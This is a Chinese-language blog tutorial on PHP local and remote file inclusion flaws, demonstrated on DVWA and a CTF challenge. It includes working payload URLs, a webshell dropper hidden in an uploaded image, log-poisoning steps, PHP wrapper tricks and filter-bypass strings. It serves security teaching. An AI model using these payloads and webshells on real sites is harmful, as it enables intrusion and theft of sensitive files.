文件包含漏洞从入门到精通

2025-01-09 3 0

文件包含漏洞

一、什么是文件包含漏洞

  1. 漏洞成因:

    • 为了提高代码的复用性和模块化,开发人员通常会将可重复使用的函数或代码段写入到单个文件中。在需要使用这些函数或代码段时,直接调用此文件,而无需再次编写。这种调用文件的过程被称为“包含”。

    • 开发人员没有对用户输入的参数进行正确的过滤和检查,导致攻击者可以在包含文件时控制参数的值,从而访问敏感文件或执行恶意代码。

  2. 漏洞函数:include(),require(),include_once(),require_once()

    • include()函数包含并运行指定文件,文件不存在发出警告,脚本继续执行。

    • require()函数处理失败时报错,脚本终止。

    • include_once()和include类似,但只包含一次。

    • require_once()与require相似,但只包含一次。

  3. 漏洞分类:

    • 本地文件包含(Local File Inclusion, LFI):攻击者可以读取任何文件,包括敏感的配置文件、密码文件。

    • 远程文件包含(Remote File Inclusion, RFI):攻击者可以访问远程服务器上的文件或者下载、执行恶意代码。

二、本地文件包含漏洞利用方式

1. 文件读取

使用一个不存在的文件测试,发现有警告,且爆出了绝对路径,我们看下源代码,使用include()函数的特点文件包含漏洞从入门到精通插图

if( isset( $file ) )
include( $file );
else {
header( 'Location:?page=include.php' );
exit;
}

将include函数修改为require函数再试一次,发现报错

文件包含漏洞从入门到精通插图1

回归正题,绝对路径读取C盘下的win.ini

文件包含漏洞从入门到精通插图2

使用…/…/相对路径读取

文件包含漏洞从入门到精通插图3

敏感文件:

  • 存储用户账号信息 /etc/passwd

  • 存储用户密码的哈希值 /etc/shadow

  • apache配置文件 /etc/httpd/conf/httpd.conf(centos);/etc/apache2/apache2.conf(ubuntu)

  • apache日志文件 /var/log/httpd/access_log(centos);/var/log/apache2/access.log(ubuntu)

  • nginx配置文件 /etc/nginx/nginx.conf

  • nginx日志文件 /var/log/nginx/access.log

2. 文件执行

在该目录上传一个phpinfo.php

<?php phpinfo();?>

使用文件包含漏洞,发现成功解析

文件包含漏洞从入门到精通插图4

由此可见,被包含的php文件中的代码会被执行

小思路:当我们发现了一个文件包含漏洞,但我们只能去读取一些本地的文件,不能getshell,恰好在这个网站上有文件上传点,这个文件上传点不能上传木马,只能发送图片,而这个图片却没有做严格的限制;或上传的木马因权限问题无法访问时,这两个漏洞结合一下的话,就能达到很大效果了。比如我们上传了一个图片木马,网站不能解析,但们可以使用文件包含漏洞,去对这个文件进行包含,文件包含会执行php代码。

(1)配合文件上传getshell

上传一个jpg文件

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');?> 
# 在该目录下写一个shell.php的木马

文件包含漏洞从入门到精通插图5

payload:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://127.0.0.1/dvwa/hackable/uploads/shell.jpg包含一下这个jgp文件,使用文件包含漏洞执行php代码,使用蚁剑连接一下。

文件包含漏洞从入门到精通插图6

(2)配合日志文件getshell

环境:ctfshow web4

访问一个不存在的路径https://b72a9fce-0d8a-4e30-bf3f-cd69a4b0f57b.challenge.ctf.show/ddddddsb

查看日志(nginx默认日志/var/log/nginx/access.log):https://b72a9fce-0d8a-4e30-bf3f-cd69a4b0f57b.challenge.ctf.show/?url=/var/log/nginx/access.log,发现我们的请求被记录

文件包含漏洞从入门到精通插图7

包含时间、ip、请求路径、user-agent。使用burp抓包在ua处插入一句话木马

文件包含漏洞从入门到精通插图8

使用蚁剑进行连接

文件包含漏洞从入门到精通插图9

三、远程文件包含(RFI)利用方式

1. 包含远程恶意文件

测试https://www.baidu.com文件包含漏洞从入门到精通插图10

在vps上布置一个恶意php脚本

python -m http.server 8000 # 使用python开启http服务

远程包含恶意文件http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://172.16.14.105:8000/phpinfo.php

文件包含漏洞从入门到精通插图11

四、伪协议的利用

1. file://

  1. 作用:读取本地文件

  2. 使用方法:file://[文件的绝对路径和文件名]

    文件包含漏洞从入门到精通插图12

2. php://filter

  1. 作用:设计用于数据流打开时的筛选过滤应用。

  2. 使用方法:

    resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选
    read=<读链的筛选列表> 可以设定一个或多个过滤器名称,以管道符()分隔。 可选
    write=<写链的筛选列表> 可以设定一个或多个过滤器名称,以管道符()分隔。 可选
    <;两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

    • base64编码读文件:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=D:/phpstudy_pro/WWW/dvwa/php.ini

      文件包含漏洞从入门到精通插图13

3. php://input

  1. 作用:可以访问请求的原始数据的只读流

  2. 使用方法:php://input + [POST DATA]执行php代码

    文件包含漏洞从入门到精通插图14

4. data://

  1. 作用:可以用来执行PHP代码。

  2. 使用方法:

    • data://text/plain,

    • data://text/plain;base64

      http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data://text/plain,%3C?php%20phpinfo();?%3E

      文件包含漏洞从入门到精通插图15

      http://127.0.0.1/dvwa/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

      文件包含漏洞从入门到精通插图16

5. http:// & https://

  1. 作用:允许通过HTTP 1.0的 GET方法,以只读访问文件或资源。

  2. 使用方法:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

    文件包含漏洞从入门到精通插图17

6. zip:// & bzip2:// & zlib://

  1. 作用:可以访问压缩文件中的子文件,且不需要指定后缀名。

  2. 使用方法:压缩 phpinfo.txt 为 phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传

    http://127.0.0.1/dvwa/vulnerabilities/fi/?page=zip://D:\phpstudy_pro\WWW\dvwa\hackable\uploads\phpinfo.jpg%23phpinfo.txt

    文件包含漏洞从入门到精通插图18

五、绕过方式

1. 大小写、双写绕过

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>

过滤了'http://';'https://';

大小写绕过:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=HtTp://www.baidu.com

双写绕过:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=hthttp://tp://www.baidu.com

过滤'../';'..\\',双写绕过:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..././..././php.ini

2. 伪协议绕过

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}

?> 
# 使用fnmatch函数检查page参数,要求page参数的开头必须是file

file伪协议绕过:http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///D:/phpstudy_pro/WWW/dvwa/php.ini

文件包含漏洞从入门到精通插图19


相关文章:

  1. 记一次从登录框到前台rce
  2. 第四届网鼎杯白虎组解密思路总结
  3. 米桃安全漏洞讲堂系列第4期:WebShell木马专题
  4. GoldenEye?卫星? 在网络安全的视角带你重新观影!
  5. 记一次学校越权登录的神奇案例

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

【vulhub】Fastjson1.2.24反序列化导致任意命令执行漏洞复现
2025年,这些网安“传奇产品”都凉了?
JAVA安全 | 初探反射反序列化
2024年软件系统安全赛攻防赛web题CachedVisitor题解
企业防线的薄弱环节:深入了解供应链网络攻击的风险
震惊!?DLP还能这样用

发布评论